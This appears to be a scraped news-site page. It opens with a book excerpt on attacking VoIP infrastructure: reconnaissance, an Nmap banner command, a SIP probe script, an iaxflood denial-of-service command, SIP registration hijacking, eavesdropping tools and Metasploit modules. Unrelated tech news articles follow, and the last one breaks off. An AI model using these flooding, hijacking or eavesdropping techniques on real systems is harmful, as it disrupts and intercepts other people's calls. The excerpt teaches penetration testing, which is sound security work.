This tutorial is an extract taken from the book Advanced Infrastructure Penetration Testing, written by Chiheb Chebbi. In this book, you will explore exploitation abilities such as offensive PowerShell tools and techniques, CI servers, database exploitation, Active Directory delegation, and much more. In today's post, you will learn how to penetrate the VoIP infrastructure.

Like any other penetration test, exploiting the VoIP infrastructure requires a strategic operation based on a number of steps. Before attacking any infrastructure, we've learned that we need to perform footprinting, scanning, and enumeration before exploiting it, and that is exactly what we are going to do with VoIP.

To perform VoIP information gathering, we need to collect as much useful information as possible about the target. As a start, you can do a simple search online. Job announcements, for example, can be a valuable source of information: a job description may give the attacker an idea of which VoIP products are in use, and the attacker can then search for vulnerabilities in that particular system. Searching for phone numbers can also be a smart move to get an idea of the target from its voicemail, because each vendor has a default greeting; if the administrator has not changed it, listening to the voicemail can tell you a lot about your target. If you want to look at some of the default voicemails, check http://www.hackingvoip.com/voicemail.html. It is a great resource for learning about hacking VoIP.

Google hacking is an amazing technique for finding information and online portals. We discussed Google hacking using dorks; for example, a dork along the lines of inurl:"NetworkConfiguration" Cisco can turn up exposed Cisco VoIP configuration pages. You can also find connected VoIP devices using the Shodan.io search engine. VoIP devices are generally connected to the internet, so they can be reached by an outsider and exposed via their web interfaces. That is why leaving installation files exposed can be dangerous: a search engine may end up indexing the portal. Online Asterisk management portals and configuration pages of exposed websites can be found with simple search engine queries.

After collecting juicy information about the target, from an attacker's perspective, we usually move on to scanning. Carrying out host discovery and Nmap scanning is a good way of probing the infrastructure for VoIP devices, and scanning can lead us to discover VoIP services. For example, we saw the -sV option in Nmap for checking services. In VoIP, if port 2000 is open, the device is likely a Cisco CallManager, because the SCCP protocol uses that port by default; if UDP port 5060 is open, it is SIP. The -O Nmap option can be useful for identifying the running operating system, as a lot of VoIP devices run a specific operating system, such as Cisco's embedded one.

You know what to do now: after footprinting and scanning, we need to enumerate the target.
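As a small illustration of what such a probe can look like at the packet level (this sketch is not part of the original excerpt; the addresses are placeholders, and it should only be pointed at systems you are authorised to test), a few lines of Python can send a SIP OPTIONS request to UDP port 5060 and print whatever the device answers with, which often includes a Server or User-Agent header revealing the vendor:

import socket

# Hypothetical sketch: send a SIP OPTIONS request to UDP/5060 and print the
# response; the Server/User-Agent headers often reveal the vendor and version.
target = "192.168.1.10"          # placeholder: a host you are authorised to test
local_ip = "192.168.1.5"         # placeholder: your own address

request = (
    f"OPTIONS sip:probe@{target} SIP/2.0\r\n"
    f"Via: SIP/2.0/UDP {local_ip}:5061;branch=z9hG4bK-probe\r\n"
    f"From: <sip:probe@{local_ip}>;tag=1\r\n"
    f"To: <sip:probe@{target}>\r\n"
    f"Call-ID: probe-1@{local_ip}\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "Max-Forwards: 70\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
sock.sendto(request.encode(), (target, 5060))
try:
    data, _ = sock.recvfrom(4096)
    print(data.decode(errors="replace"))
except socket.timeout:
    print("No SIP response (host may be down, filtered, or not running SIP)")
finally:
    sock.close()

Dedicated tools introduced below, such as svmap, automate exactly this kind of probing across whole address ranges.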
As you can see, when exploiting an infrastructure we generally follow the same methodological steps. Banner grabbing is a well-known enumeration technique, and the first step in enumerating a VoIP infrastructure is a banner grab. The Netcat utility will help you grab the banner easily, or you can simply use the Nmap script named banner:

nmap -sV --script=banner <target>

For specific vendors, there are a lot of enumeration tools you can use. EnumIAX is one of them: a built-in enumeration tool in Kali Linux for brute-forcing Inter-Asterisk Exchange protocol usernames. Automated Corporate Enumerator (ACE) is another built-in enumeration tool in Kali Linux. svmap is an open source tool built into Kali Linux for identifying SIP devices; type svmap -h and you will get all the available options for this amazing tool.

VoIP attacks

By now, you have learned the skills required to perform VoIP footprinting, scanning, and enumeration. Let's look at the major VoIP attacks. VoIP faces multiple threats from different attack vectors.

Denial-of-Service

Denial-of-Service (DoS) is a threat to the availability of a network. DoS can be dangerous for VoIP too, as ensuring the availability of calls is vital in modern organizations; not only availability but also call clarity is a necessity nowadays. To monitor the QoS of VoIP, you can use one of the many tools out there, such as CiscoWorks QoS Policy Manager 4.1. To measure the quality of VoIP, there are scoring systems such as the Mean Opinion Score (MOS) or the R-value, based on several parameters (jitter, latency, and packet loss). MOS scores range from 1 to 5 (bad to very clear) and R-values range from 1 to 100 (bad to very clear). RTP packet captures, such as the sample capture available from the Wireshark website, can be analyzed for these parameters, along with the RTP jitter graph.

VoIP infrastructure can be attacked by the classic DoS attacks; we saw some of them previously:

Smurf flooding attack
TCP SYN flood attack
UDP flooding attack

One of the DoS attack tools is iaxflood, where IAX stands for Inter-Asterisk Exchange. It is available in Kali Linux for performing DoS attacks. Open a Kali terminal and type:

iaxflood <Source IP> <Destination IP> <Number of packets>

VoIP infrastructure can be attacked not only with the previous attacks; attackers can also use packet fragmentation and malformed packets, with the help of fuzzing tools.

Eavesdropping

Eavesdropping is one of the most serious VoIP attacks. It lets attackers intrude on your privacy, including your calls. There are many eavesdropping techniques; for example, an attacker can sniff the network for TFTP configuration files, which may contain passwords. An attacker can also harvest phone numbers and build a database of valid phone numbers after recording all the outgoing and incoming calls. Eavesdropping does not stop there: attackers can record your calls and even work out what you are typing by decoding the Dual-Tone Multi-Frequency (DTMF) tones. You can use the DTMF decoder/encoder from this link: http://www.polar-electric.com/DTMF/. Voice Over Misconfigured Internet Telephones (VOMIT) is a great utility for converting Cisco IP Phone conversations into WAV files. You can download it from its official website, http://vomit.xtdnet.nl/.

SIP attacks

Another attacking technique is SIP rogues. We can perform two types of SIP rogue attack.
From an attacker's perspective, we can implement the following:

Rogue SIP B2BUA: In this attacking technique, the attacker mimics a SIP B2BUA.
SIP rogue as a proxy: Here, the attacker mimics a SIP proxy.

SIP registration hijacking

SIP registration hijacking is a serious VoIP security problem. Previously, we saw that before a SIP session is established there is a registration step. Registration can be hijacked by attackers. During a SIP registration hijacking attack, the attacker disables a legitimate user, through a Denial-of-Service for example, and simply sends a registration request with his own IP address instead of that user's. This works because SIP messages are transferred in the clear, so SIP does not ensure the integrity of signalling messages.

If you are a Metasploit enthusiast, you can try many other SIP modules. Open a Metasploit console by typing msfconsole and search for SIP modules using search SIP. To use a specific SIP module, simply type use <module>.

Spam over Internet Telephony

Spam over Internet Telephony (SPIT), sometimes called voice spam, is like email spam, but it affects VoIP. To perform a SPIT attack, you can use a generation tool called spitter.

Embedding malware

Malware is a major threat to VoIP infrastructure. Insecure VoIP endpoints can be exploited by different types of malware, such as worms and VoIP botnets. Softphones are also a highly probable target for attackers: compromising a softphone can be very dangerous, because if an attacker exploits it, they can compromise your VoIP network. Malware is not the only threat against VoIP endpoints; VoIP firmware is also a potential attack vector, and firmware hacking can lead to phones being compromised.

Viproy – VoIP penetration testing kit

The Viproy VoIP penetration testing kit (v4) is a VoIP and unified communications services pentesting tool presented at Black Hat Arsenal USA 2014 by Fatih Ozavci. To download the project, clone it from its official repository, https://github.com/fozavci/viproy-voipkit:

# git clone https://github.com/fozavci/viproy-voipkit

The project contains many modules for testing the SIP and Skinny protocols. To use them, copy the lib, modules, and data folders into a Metasploit folder on your system.

Thus, in this article, we demonstrated how to exploit the VoIP infrastructure. We explored the major VoIP attacks and how to defend against them, along with the tools and utilities most commonly used by penetration testers. If you've enjoyed reading this, do check out Advanced Infrastructure Penetration Testing to discover post-exploitation tips, tools, and methodologies to help your organization build an intelligent security system.

Managing a VoIP Solution with Active Directory Depends On Your Needs
Opus 1.3, a popular FOSS audio codec with machine learning and VR support, is now generally available
Approaching a Penetration Test Using Metasploit

Facebook's CEO, Mark Zuckerberg summoned for hearing by UK and Canadian Houses of Commons

Bhagyashree R
01 Nov 2018
2 min read
Yesterday, the chairs of the UK and Canadian Houses of Commons issued a letter calling for Mark Zuckerberg, Facebook's CEO, to appear before them. The primary aim of this hearing is to get a clear idea of what measures Facebook is taking to stop the spread of disinformation on the social media platform and to protect user data. It is scheduled to take place at the Westminster Parliament on Tuesday, 27th November.

The committee has already gathered evidence regarding several data breaches and process failures, including the Cambridge Analytica scandal, and is now seeking answers from Mark Zuckerberg on what led to these incidents. Mark last attended a hearing in April this year, with the Senate's Commerce and Judiciary committees, in which he was asked about the company's failure to protect its user data, its perceived bias against conservative speech, and its use for selling illegal material like drugs. Since then, he has not attended any further hearings, instead sending other senior representatives such as Sheryl Sandberg, Facebook's COO. The letter pointed out: "You have chosen instead to send less senior representatives, and have not yourself appeared, despite having taken up invitations from the US Congress and Senate, and the European Parliament."

Throughout this year we have seen major security and data breaches involving Facebook. The social media platform faced a security issue last month that impacted almost 50 million user accounts; its engineering team discovered that hackers had found a way to exploit a series of bugs related to the View As Facebook feature. Earlier this year, Facebook faced a backlash over the Facebook-Cambridge Analytica data scandal, a major political scandal in which Cambridge Analytica used the personal data of millions of Facebook users for political purposes without their permission.

The report of this hearing will be shared in December, if Zuckerberg agrees to attend it. The committee has requested his response by 7th November. Read the full letter issued by the committee.

Facebook is at it again. This time with Candidate Info where politicians can pitch on camera
Facebook finds 'no evidence that hackers accessed third party Apps via user logins', from last week's security breach
How far will Facebook go to fix what it broke: Democracy, Trust, Reality


Google employees ‘Walkout for Real Change’ today. These are their demands.

Natasha Mathur
01 Nov 2018
5 min read
More than 1,500 Google employees around the world are planning to walk out of their respective Google offices today to protest against Google's handling of sexual misconduct within the workplace, according to the New York Times. This is part of the "women's walkout" organized earlier this week by more than 200 Google engineers in response to Google's handling of sexual misconduct in the recent past, which employees found inadequate.

The planning for the walkout began last Friday, when Claire Stapleton, a product marketing manager at Google's YouTube, created an internal mailing list to organize the walkout, according to the New York Times. More than 200 employees had joined in over the weekend, a number which has since grown to more than 1,500. The organizers took to Twitter yesterday to lay out five demands for change within the workplace. The protest has already started at Google's Tokyo and Singapore offices, and Google employees and contractors across the globe will be leaving work at 11:10 AM in their respective time zones.

Here are some glimpses from the walkout:

https://twitter.com/GoogleWalkout/status/1058199862502612993
https://twitter.com/EmmaThomson2/status/1058180157804994562
https://twitter.com/GoogleWalkout/status/1058018104930897920
https://twitter.com/GoogleWalkout/status/1058010748444700672
https://twitter.com/GoogleWalkout/status/1058003099581853697

The demands laid out by the Google employees are as follows:

An end to forced arbitration in cases of harassment and discrimination for all current and future employees. This means that Google should no longer require people to waive their right to sue. In fact, every employee should be given the right to bring a co-worker, representative, or supporter of their choice when meeting with HR to file a harassment claim.

A commitment to end pay and opportunity inequity. This includes making sure that there are women of color at all levels of the organization. There should also be transparent data on the gender, race, and ethnicity compensation gap, across both level and years of industry experience, and the methods and techniques used to aggregate such data should also be transparent.

A publicly disclosed sexual harassment transparency report. This includes the number of harassment claims at Google over time, the types of claims submitted, how many victims and accused have left Google, and details about exit packages and their worth.

A clear, uniform, and globally inclusive process for reporting sexual misconduct safely and anonymously. The current process is not working: HR's performance is assessed by senior management and directors, which forces HR to put management's interests ahead of the employees who report harassment and discrimination. Accountability, safety, and the ability to report unsafe working conditions should not be dictated by employment status.

Elevate the Chief Diversity Officer to answer directly to the CEO and make recommendations directly to the Board of Directors, and appoint an employee representative to the Board.

The frustration among Google employees surfaced after a New York Times report brought to light shocking allegations of sexual misconduct at Google against Andy Rubin, the creator of Android. As per the report, Rubin was accused of misbehavior in 2014 and the allegations were confirmed by Google.
Due to this, he was asked to leave by former Google CEO Larry Page, but what is discreditable is that Google paid him a $90 million exit package. He also received a high-profile, well-respected farewell from Google in October 2014. Moreover, senior executives such as David Drummond, Alphabet's Chief Legal Officer, who were mentioned in the NY Times report for indulging in "inappropriate relationships" within the organization, continue to hold highly placed positions at Google and have not faced any real punitive action for their past behavior.

"We don't want to feel that we're unequal or we're not respected anymore. Google's famous for its culture. But in reality, we're not even meeting the basics of respect, justice, and fairness for every single person here," Stapleton told the NY Times.

Google CEO Sundar Pichai had sent an email to all Google employees last Thursday, clarifying that the company has fired 48 people for sexual harassment over the last two years, of whom 13 were "senior managers and above". He also mentioned that none of them received any exit packages.

Pichai further apologized in an email obtained by Axios this Tuesday, saying that the "apology at TGIF didn't come through, and it wasn't enough". Pichai also mentioned that he supports the engineers at Google who have organized the walkout. "I am taking in all your feedback so we can turn these ideas into action. We will have more to share soon. In the meantime, Eileen will make sure managers are aware of the activities planned for Thursday and that you have the support you need," wrote Pichai.

The very same day, news came to light that Richard DeVaul, a director at X, a unit of Alphabet (Google's parent company), whose name was also mentioned in the New York Times report, had resigned from the company. DeVaul had been accused of sexually harassing Star Simpson, a hardware engineer. DeVaul did not receive any exit package on his resignation.

Public response to the walkout has been largely positive:
https://twitter.com/lizthegrey/status/1057859226100355072
https://twitter.com/amrtgaber/status/1057822987527761920
https://twitter.com/sparker2/status/1057846019122069508
https://twitter.com/LisaIronTongue/status/1057852658948595712

Ex-googler who quit Google on moral grounds writes to Senate about company's "Unethical" China censorship plan
OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly?
Google takes steps towards better security, introduces new API policies for 3rd parties and a Titan Security system for mobile devices


Social media platforms, Twitter and Gab.com, accused of facilitating recent domestic terrorism in the U.S.

Savia Lobo
29 Oct 2018
6 min read
Updated on 30th Oct 2018: Following PayPal, two additional platforms, Stripe and Joyent, have suspended Gab accounts from their respective platforms.

Social media platforms Twitter and Gab.com were at the center of two shocking stories of domestic terrorism. Both platforms were used by the men responsible for the mail bomb attacks and Pittsburgh's Tree of Life synagogue shooting to send cryptic threats. Following the events, both platforms have been accused of failing to act appropriately, both in terms of their internal policies and their ability to coordinate with law enforcement to deal with the threats.

Twitter fails to recognize a bomb attacker: mail bomber sent a threat on Twitter first

Twitter neglected an abuse report filed by a Twitter user against the mail bombing suspect. Rochelle Ritchie, a former congressional press secretary, tweeted that she had received threats from Cesar Altieri Sayoc via Twitter. Sayoc was later arrested and charged in connection with mailing at least 13 suspected explosive devices to prominent Democrats, the staff at CNN, and other U.S. officials, as Bloomberg reported.

On October 11, Ritchie received a tweet from an account using the handle @hardrock2016. The message was bizarre, saying, "So you like make threats. We Unconquered Seminole Tribe will answer your threats. We have nice silent Air boat ride for u here on our land. We will see you 4 sure. Hug your loved ones real close every time you leave your home." Ritchie immediately reported this to Twitter as abuse. Twitter responded that the tweet did not qualify as a "violation of the Twitter rules against abusive behavior." The tweet remained visible on Twitter until Sayoc was arrested on Friday.

Ritchie tweeted again on Friday, "Hey @Twitter remember when I reported the guy who was making threats towards me after my appearance on @FoxNews and you guys sent back a bs response about how you didn't find it that serious. Well, guess what it's the guy who has been sending #bombs to high profile politicians!!!!"

Later in the day, Twitter apologized in reply to Ritchie's tweet, saying it should have taken a different action when Ritchie first approached it. Twitter's statement said, "The Tweet clearly violated our rules and should have been removed. We are deeply sorry for that error."

Twitter has been keen to assure users that it is working hard to combat harassment and abuse on its platform. But many users disagree.
https://twitter.com/Luvvie/status/1055889940150607872

Even the apology sent to Ritchie looks a lot like the company is trying to sweep the matter under the carpet. This wasn't the first time Sayoc used Twitter to post his sentiments. On September 18th, Sayoc tweeted a picture of former Vice President Joe Biden's home and wrote, "Hug your loved son, Niece, wife family real close everytime U walk out your home." On September 20, in response to a tweet from President Trump, Sayoc posted a video of himself at what appears to be a Donald Trump rally. The text of the tweet threatened former Vice President Joe Biden and former attorney general Eric Holder. Later that week, they were targeted by improvised explosive devices. Twitter suspended Sayoc's accounts late Friday afternoon last week.
Shooter hinted at Pittsburgh shooting on Gab.com

"It's a very horrific crime scene; one of the worst that I've seen," Public Safety Director Wendell Hissrich said at a press conference.

Gab.com, which describes itself as "The Home Of Free Speech Online", was allegedly linked to the shooting at a synagogue in Pittsburgh on Saturday, 27th October '18. The 46-year-old suspected shooter, named Robert Bowers, posted on his Gab page, "jews are the children of satan." He also reportedly shouted "all Jews must die" before he opened fire at the Tree of Life synagogue in Pittsburgh's Squirrel Hill neighborhood. According to The Hill's report, "Gab.com rejected claims it was responsible for the shooting after it confirmed that the name identified in media reports as the suspect matched the name on an account on its platform."

PayPal, GoDaddy suspend Gab.com for promoting hate speech

Following the Pittsburgh shooting incident, PayPal banned Gab.com. A PayPal spokesperson confirmed the ban to The Verge, citing hate speech as the reason for the action: "The company is diligent in performing reviews and taking account actions. When a site is explicitly allowing the perpetuation of hate, violence or discriminatory intolerance, we take immediate and decisive action."
https://twitter.com/getongab/status/1056283312522637312

Similarly, GoDaddy, a domain hosting provider, has threatened to suspend the Gab.com domain if it fails to transfer to a new provider. Currently, Gab is inaccessible through the GoDaddy website.

Gab.com denies enabling hate speech

Denying the claims, Gab.com said that it has zero tolerance for terrorism and violence. "Gab unequivocally disavows and condemns all acts of terrorism and violence," the site said in a statement. "This has always been our policy. We are saddened and disgusted by the news of violence in Pittsburgh and are keeping the families and friends of all victims in our thoughts and prayers."

Gab was quick to respond to the accusation, taking swift and proactive action to contact law enforcement. It first backed up all user data from the account and then proceeded to suspend it. "We then contacted the FBI and made them aware of this account and the user data in our possession. We are ready and willing to work with law enforcement to see to it that justice is served," Gab said. Gab.com also stated that the shooter had accounts on other social media platforms, including Facebook, which has not yet confirmed the deactivation of the account.

Federal investigators are reportedly treating the attack as a potential hate crime. This incident is a stark reminder of how online hate can easily escalate into the real world. It also sheds light on how easy it is to misuse any social media platform to post threats, some of which can also be hoaxes. Most importantly, it underscores how ill-equipped social media platforms are, not just at identifying such threats, but also at prioritizing content manually flagged by users and at alerting the concerned authorities in time to avert tragedies such as this.

To gain more insights into these two scandals, head over to CNN and The Hill.

5 nation joint Activity Alert Report finds most threat actors use publicly available tools for cyber attacks
Twitter on the GDPR radar for refusing to provide a user his data due to 'disproportionate effort' involved
90% Google Play apps contain third-party trackers, share user data with Alphabet, Facebook, Twitter, etc: Oxford University Study


4 reasons IBM bought Red Hat for $34 billion

Richard Gall
29 Oct 2018
8 min read
The news that IBM is to buy Red Hat - the enterprise Linux company - shocked the software world this weekend. It took many people by surprise because it signals a weird new world where the old guard of tech conglomerates - almost prehistoric in the history of the industry - are revitalizing themselves by diving deep into the open source world for pearls. So, why did IBM decide to buy Red Hat? And why has it spent so much to do it?

Why did IBM decide to buy Red Hat?

For IBM this was an expensive step into a new world. But it wouldn't have taken it without good reason. And although it's hard to settle on one single reason that forced IBM's decision makers to put money on the table, there is certainly a combination of factors that means this move simply makes sense from IBM's perspective. Here are 4 reasons why IBM is buying Red Hat:

- Competing in the cloud market
- Disappointment around the success of IBM Watson
- Catching up with Microsoft
- To help provide support for an important but struggling Linux organization

Let's take a look at each of these in more detail.

IBM wants to get serious about cloud computing

IBM has been struggling in a competitive cloud market. It's not exactly out of the running, with some reports placing it third behind AWS and Microsoft Azure, and others fourth, with Google's cloud offering above it. But wherever the company stands, it's true that it is not growing at anywhere near the rate of its competitors. Put simply, if it didn't act, IBM would lose significant ground in the cloud computing race.

It's no coincidence that cloud was right at the top of the IBM press release. Ginni Rometty, IBM Chairman, President and Chief Executive Officer, is quoted as saying, "The acquisition of Red Hat is a game-changer. It changes everything about the cloud market... IBM will become the world's #1 hybrid cloud provider, offering companies the only open cloud solution that will unlock the full value of the cloud for their businesses."

Clearly, IBM wants to bring itself up to date. As The Register wrote when it covered the story on Sunday, IBM "really, really, really wants to transform itself into a cool and trendy hybrid cloud platform, rather than be seen eternally as a maintainer of legacy mainframes and databases."

But why buy Red Hat?

You might still be thinking: well, why does IBM need Red Hat to do all this? Can't it just do it itself? It ultimately comes down to expanding what businesses can do with cloud - and bringing an open source company into the IBM family will allow IBM to deliver much more effectively on this than it has before. AWS appears to implicitly understand that features and capabilities are everything when it comes to cloud - to be truly successful, IBM needs to adopt both an open source mindset and toolset to innovate at a fast pace. This is what Rometty is referring to when she talks about "the next chapter of the cloud." This is where cloud becomes more about "extracting more data and optimizing every part of the business, from supply chains to sales" than about storage space.

IBM's artificial intelligence product, Watson, hasn't taken off

IBM is a company with its proverbial finger in many pies. Its artificial intelligence product, Watson, hasn't had the success that the company expected. Instead, it has suffered a number of disappointing setbacks this year, resulting in Deborah DiSanzo, the head of Watson Health, stepping down just a week ago.
One of the biggest stories was MD Anderson Cancer Center stepping away from a contract with IBM, after a report by analysts at investment bank Jefferies claimed that the software was "not ready for human investigational or clinical use." There are other stories too - all of which come together to paint a picture of a project that doesn't live up to or deliver on its hype.

By contrast, AI has been most impactful as part of a cloud product. Just look at the furore around the AI tools within AWS - there's no way government agencies and the military would be quite so interested in the product if it wasn't packaged in a way that could be easily deployed. AWS, unlike IBM, understood that AI is only worth the hype if organizations can use it easily. In effect, we're past the period where AI deserves hype on its own - it needs to be part of a wider suite of capabilities that enable innovation and invention with minimal friction. If IBM is to offer Watson's capabilities to a broad set of users, all with varying use cases, it can begin to think much more about how the end product can deliver the biggest impact for each of those cases.

IBM is playing catch up with Microsoft in terms of open source

IBM's move might be surprising, but in the context of Microsoft's transformation over the last decade, it's part of a wider pattern. The only difference is that Microsoft's attitude to open source has slowly thawed, whereas IBM has gone all out, taking an unexpected leap into the unknown. It's a neat coincidence that this was the weekend that GitHub officially became part of Microsoft. It's as if IBM saw Microsoft basking in the glow of an open source embrace and thought: we want that.

Envy aside, there are serious implications. The future is now quite clearly open source - in fact, it has been for some time. You might even say that Microsoft hasn't been as quick as it could have been. But for IBM, open source has been seen simply as a tasty slice of the software pie - great, but not the whole thing. This was a misunderstanding - open source is everything. It almost doesn't even make sense to talk about open source as if it were distinct from everything else - it is software today. It's defining the future. Joseph Jacks, the founder of Open Source Capital, said that "IBM buying @RedHat is not about dominating the cloud. It is about becoming an OSS company. The largest proprietary software and tech companies in the world are now furiously rushing towards the future. An open future. An open source software driven future. OSS eats everything."
https://twitter.com/asynchio/status/1056693588640194560

IBM is heavily invested in Linux - and Red Hat isn't exactly thriving

However, although open source might be the dominant mode of software in 2018, there are a few murmurs about its sustainability and resilience. So, despite being central to just about everything we build and use when it comes to software, from a business perspective it isn't exactly thriving. Red Hat is a brilliant case in point. Despite being one of the first and most successful open source software businesses, providing free, open source software to customers in return for a support fee, its revenues are down. Shares fell 14% in June following a disappointing financial forecast - and have fallen further since then.
This piece in TechCrunch, almost 5 years old, does a good job of explaining the relative success of Red Hat, as well as its limitations: "When you compare the market cap and revenue of Red Hat to Microsoft or Amazon or Oracle, even Red Hat starts to look like a lukewarm success. The overwhelming success of Linux is disproportionate to the performance of Red Hat. Great for open source, a little disappointing for Red Hat."

From this perspective, the stage is set for an organisation like IBM to come in and start investing in Red Hat as a foundational component of its future product and software strategy. Given that both organizations are heavily invested in Linux, this could be a really important relationship in supporting the project in the future. And although a multi-billion-dollar acquisition might not look like open source in action, it might also be one of the only ways that open source is going to survive and thrive in the future.

Thanks to Amarabha Banerjee, Aarthi Kumaraswamy, and Amey Varangaonkar for their help with this post.

Update on 9th July, 2019

As per a report from Fortune, IBM on Tuesday morning closed its $34 billion acquisition of Red Hat, which was announced last October. The pricey deal, which paid Red Hat owners a hefty premium of more than 60%, marks IBM CEO Ginni Rometty's biggest bet yet in transforming her 108-year-old technology company. In an interview Tuesday morning, she said some tech analysts have assumed the move to the cloud would lead to a "winner take all" scenario, where one giant platform - Amazon Web Services? - ends up with all the business. Read the full story here.

‘We are not going to withdraw from the future’ says Microsoft’s Brad Smith on the ongoing JEDI bid, Amazon concurs

Prasad Ramesh
29 Oct 2018
5 min read
The Pentagon has been trying to get hold of AI and related technologies from tech giants. Google employees had quit over it, and Microsoft employees had asked the company to withdraw from the JEDI project. Last Friday, Microsoft President Brad Smith wrote about Microsoft and the US military and the company's vision in this area.

Amazon, Microsoft, IBM, and Oracle are the companies that have bid for the Joint Enterprise Defense Infrastructure (JEDI) project. JEDI is a department-wide cloud computing infrastructure that will give the Pentagon access to weapons systems enhanced with artificial intelligence and cloud computing.

Microsoft believes in defending the USA

"We are not going to withdraw from the future, in the most positive way possible, we are going to work to help shape it," said Brad Smith, President at Microsoft, indicating that Microsoft intends to provide its technology to the Pentagon. Microsoft did not shy away from bidding on the Pentagon's JEDI project. This is in contrast to Google, which opted out of the same program earlier this month citing ethical concerns. Smith expressed Microsoft's intent to provide AI and related technologies to the US defense department, saying, "we want the people who defend USA to have access to the nation's best technology, including from Microsoft".

Smith stated that Microsoft's work in this area is based on three convictions:

- Microsoft believes in the strong defense of the USA and wants the defenders to have access to the nation's best technology, including Microsoft's.
- It wants to use its 'knowledge and voice' to address ethical AI issues via the nation's 'civic and democratic processes'.
- It gives its employees the option to opt out of working on these projects, given that, as a global company, it employs people from many different countries.

Smith shared that Microsoft has had a long-standing relationship with the US Department of Defense (DOD). Its technology has been used throughout the US military, from the front office to field operations. This includes bases, ships, aircraft, and training facilities.

Amazon shares Microsoft's visions

Amazon shares Microsoft's vision of empowering US law enforcement and defense institutions with the latest technology. Amazon already provides cloud services to power the Central Intelligence Agency (CIA). Amazon CEO Jeff Bezos said: "If big tech companies are going to turn their back on the Department of Defense, this country is going to be in trouble."

Amazon also provides US law enforcement with its facial recognition technology, called Rekognition. This has been a bone of contention not just for civil rights groups but also for some of Amazon's employees. Rekognition is meant to help identify and incarcerate undesirable people, but it does not work with much accuracy. In a study by the ACLU, Rekognition incorrectly identified 28 members of the US Congress. The American Civil Liberties Union (ACLU) has now filed a Freedom of Information Act (FOIA) request demanding that the Department of Homeland Security (DHS) disclose how DHS and Immigration and Customs Enforcement (ICE) use Rekognition for law enforcement and immigration checks.

Google's rationale for withdrawing from the JEDI project

Last week, in an interview with the Fox Network, Oracle founder Larry Ellison stated that it was shocking how Google viewed this matter. Google withdrew from the JEDI project following strong backlash from many of its employees.
In its official statement, Google said that the reason for dropping out of the JEDI contract bidding was an ethical value misalignment, and also that it does not fully have all the necessary clearances to work on government projects. However, Google is open to launching a customized search engine in China that complies with China's censorship rules, including the potential to surveil Chinese citizens.

Should AI be used in weapons?

This question is at the heart of the contentious topic of the tech industry working with the military. It is a serious topic that has been debated over the years by educated scientists and experienced leaders. Elon Musk, researchers from DeepMind, and others have even pledged not to build lethal AI. Personally, I side with the researchers and believe AI should be used exclusively for the benefit of mankind, to enhance human lives and solve problems that improve people's lives - not against each other in a race to build weapons or to become a superpower. But then again, what would I know? Leading nations are in an AI arms race as we speak, with sophisticated national AI plans and agendas.

For more details on Microsoft's interest in working with the US military, visit the Microsoft website.

'Employees of Microsoft' ask Microsoft not to bid on US Military's Project JEDI in an open letter
Google employees quit over company's continued Artificial Intelligence ties with the Pentagon
Oracle's bid protest against U.S. Defense Department's (Pentagon) $10 billion cloud contract


IBM acquired Red Hat for $34 billion making it the biggest open-source acquisition ever

Sugandha Lahoti
29 Oct 2018
4 min read
In probably the biggest open source acquisition ever, IBM has acquired all of the issued and outstanding common shares of Red Hat for $190.00 per share in cash, representing a total enterprise value of approximately $34 billion. However, whether this deal is more of a business proposition than a contribution to the community remains a question.

Red Hat has been struggling on the market recently. It missed its most recent revenue estimates and its guidance fell below Wall Street targets. Prior to this deal, it had a market capitalization of about $20.5 billion. With this deal, Red Hat may soon regain control of its sinking ship. It will also remain a distinct unit within IBM. The company will continue to be led by Jim Whitehurst, Red Hat's CEO, and Red Hat's current management team. Whitehurst will also join IBM's senior management team and report to Ginni Rometty, IBM Chairman, President, and Chief Executive Officer.

Why is Red Hat joining forces with IBM?

In the announcement, Whitehurst assured that IBM's acquisition of Red Hat will help the company accelerate without compromising its culture and policies. He said, "Open source is the default choice for modern IT solutions, and I'm incredibly proud of the role Red Hat has played in making that a reality in the enterprise." He added, "Joining forces with IBM will provide us with a greater level of scale, resources, and capabilities to accelerate the impact of open source as the basis for digital transformation and bring Red Hat to an even wider audience--all while preserving our unique culture and unwavering commitment to open source innovation."

What is IBM gaining from this acquisition?

IBM believes this acquisition to be a game changer. "It changes everything about the cloud market," said Ginni. "IBM will become the world's #1 hybrid cloud provider, offering companies the only open cloud solution that will unlock the full value of the cloud for their businesses." IBM and Red Hat will accelerate hybrid multi-cloud adoption across all companies. Together, they plan to "help clients create cloud-native business applications faster, drive greater portability and security of data and applications across multiple public and private clouds, all with consistent cloud management."

"IBM is committed to being an authentic multi-cloud provider, and we will prioritize the use of Red Hat technology across multiple clouds," said Arvind Krishna, Senior Vice President, IBM Hybrid Cloud. "In doing so, IBM will support open source technology wherever it runs, allowing it to scale significantly within commercial settings around the world."

IBM assures that it will continue to build and enhance Red Hat's partnerships with major cloud providers. It will also remain committed to Red Hat's open governance, open source contributions, participation in the open source community, and development model. The company is keen on preserving the independence and neutrality of Red Hat's open source development culture and go-to-market strategy.

The news was well received by the top Red Hat decision makers, who embraced it with open arms. However, ZDNet reported that many Red Hat employees were skeptical:

"I can't imagine a bigger culture clash."
"I'll be looking for a job with an open-source company."
"As a Red Hat employee, almost everyone here would prefer it if we were bought out by Microsoft."
People's reactions to this acquisition on Twitter are also varied:
https://twitter.com/samerkamal/status/1056611186584604672
https://twitter.com/pnuojua/status/1056787520845955074
https://twitter.com/CloudStrategies/status/1056666824434020352
https://twitter.com/svenpet/status/1056646295002247169

Read more about the news in IBM's newsroom.

Red Hat infrastructure migration solution for proprietary and siloed infrastructure
IBM launches industry's first 'Cybersecurity Operations Center on Wheels' for on-demand cybersecurity support
IBM Watson announces pre-trained AI tools to accelerate IoT operations


How to easily access a Windows system using publicly available exploits [Video]

Savia Lobo
26 Oct 2018
2 min read
The recent 'Activity Alert Report' released by the NCCIC highlights that the majority of exploits around the globe are carried out using publicly available tools. For more details, read our article on the five tools most frequently used by cybercriminals across the globe.

Exploiting a vulnerability in software running on a machine can give access to the entire machine. The vulnerable application can be a service running in the OS, a web server, or an SSH server. Any service that opens a port or is accessible in some other way can be targeted. Exploit development is an extremely time-consuming and complex process, so it is difficult to develop your own exploits. In most penetration tests, publicly available exploits are used instead. Whether an exploit works depends on various factors, such as the version of the vulnerable software, the way it is configured, and the OS used (a minimal sketch of this workflow appears at the end of this piece).

